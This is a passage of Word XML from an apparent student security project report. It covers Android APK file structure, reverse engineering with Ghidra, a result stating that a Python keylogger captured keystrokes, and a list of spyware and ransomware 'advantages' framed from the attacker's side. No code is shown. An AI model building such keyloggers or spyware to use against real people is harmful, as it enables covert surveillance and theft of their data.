    <w:p w14:paraId="36E4A7EF"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META-INF: The "META-INF" folder contains metadata information about the APK, such as signature files, manifest information, and certificates. These files are used for package verification and integrity checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B3CDC" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>imported.RSA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>: This file holds the digital certificate used to sign the APK. It's like the seal of authenticity for the application. The RSA algorithm is often used for generating and verifying digital signatures. It ensures that the APK comes from a trusted source and hasn't been tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332AB73D" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C4679F" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>imported.SF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>: It accompanies the digital certificate and contains cryptographic signatures for different files within the APK. These signatures help confirm that the files have not been altered and remain as intended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C7E4AC" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>manifest.mf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>: This file is the manifest file associated with the JAR (Java Archive) format. It lists all the files within the APK along with their corresponding SHA-1 checksums. It ensures the integrity of the APK's contents, ensuring that nothing has been modified or corrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C973E"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org: The "org" folder may contain Java or Kotlin classes that belong to a specific package or namespace within the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62E9A2"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r: The "r" folder contains </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>pngs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>webp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9C9F5" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C638A74" wp14:editId="31C33713">
            <wp:extent cx="2530059" cy="1280271"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="20862771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77113" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2530059" cy="1280271"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B5C19A" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>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The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>webp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> files and PNGs stored here represent the graphical assets used within the application. They are the building blocks of the app's visual appeal, captivating users with their vibrant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>colors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, crisp details, and delightful designs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED105B0" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>WebP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> files, pioneered by Google, offer impressive image compression while maintaining visual quality. They are ideal for reducing the file size of images without sacrificing much of their visual fidelity. These files make the app load faster and contribute to a smoother user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D41B7D" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2F4946"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>class.dex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> files: The "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>class.dex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>" files are Dalvik Executable files that contain the compiled bytecode of the application's Java or Kotlin classes. These files are crucial for the application's execution on Android devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101AEB7B" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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Firebase properties files and play-service-properties files: These files are configuration files related to Firebase and Google Play services integration. They may contain settings and credentials required for the application's interaction with Firebase services and Google Play services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C89AA2" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC4CC4F" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA1E690" w14:textId="2EF08479" w:rsidR="00C24704" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00C24704">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5</w:t>
      </w:r>
      <w:r w:rsidR="00C24704" w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C24704" w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>RESULT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C24704" w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170EEF8F" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00C24704"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lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The final findings of the project demonstrated the successful implementation of the Python keylogger, which effectively captured and logged keystrokes as intended. Screenshots of the logged data and the user interface of the keylogger can be presented as evidence of its functionality.</w:t>
      </w:r>
      <w:r w:rsidR="00DA1F4A" w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD24A4" w14:textId="0450490B" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31339CD8" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C518CDE" wp14:editId="6F9604E6">
            <wp:extent cx="4937760" cy="3540668"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1465933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33857" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4943919" cy="3545085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E34071" w14:textId="2414C836" w:rsidR="00C24704" w:rsidRPr="002C7722" w:rsidRDefault="00C24704" w:rsidP="00C24704">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712C146D" w14:textId="77777777" w:rsidR="00C24704" w:rsidRPr="002C7722" w:rsidRDefault="00C24704" w:rsidP="00C24704">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Regarding the reverse engineering using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, the analysis provided valuable insights into the mobile APK's code structure and functionalities. Screenshots of relevant code snippets and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ghidra's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface can be included to showcase the obtained findings and highlight any identified vulnerabilities or security concerns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3667EE0D" w14:textId="65F0FEA9" w:rsidR="00C24704" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00C24704">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6</w:t>
      </w:r>
      <w:r w:rsidR="00C24704" w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C24704" w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">ADVANTAGES &amp; DISADVANTAGES </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2256874A" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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Spyware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D17E46B"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Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614BC3B3"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 a) Information Gathering: Spyware provides attackers with detailed information about a target's activities, allowing them to gather sensitive data, monitor communications, and gain insights into user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D47C52D"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 b) Remote Access: Spyware often grants attackers remote access to the infected system, enabling them to control the device, execute commands, and install additional malware. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C90E8B0" w14:textId="329F8897"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c) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Stealthiness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031366D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>: Spyware operates silently in the background, making it difficult for users to detect its presence and increasing its effectiveness as a surveillance tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11FBB6"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Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE88A3"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 a) Invasion of Privacy: Spyware infringes upon an individual's privacy by monitoring and recording their activities without consent. It compromises confidentiality and can lead to the misuse of personal information. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095EEA5"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b) System Performance Impact: Spyware can significantly impact system performance, causing slowdowns, crashes, and excessive resource usage due to its constant monitoring and data collection activities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B9ABB" w14:textId="6CFC92BB"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lastRenderedPageBreak/>
        <w:t>c) Security Risks: Spyware opens the door for other malicious activities, as attackers can use the compromised system as a launching pad for further attacks or data breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FABB5E7" w14:textId="77777777" w:rsidR="0031366D" w:rsidRPr="0031366D" w:rsidRDefault="0031366D" w:rsidP="0031366D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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Ransomware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BB2A3A"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Advantages:</w:t>
      </w:r>
    </w:p>
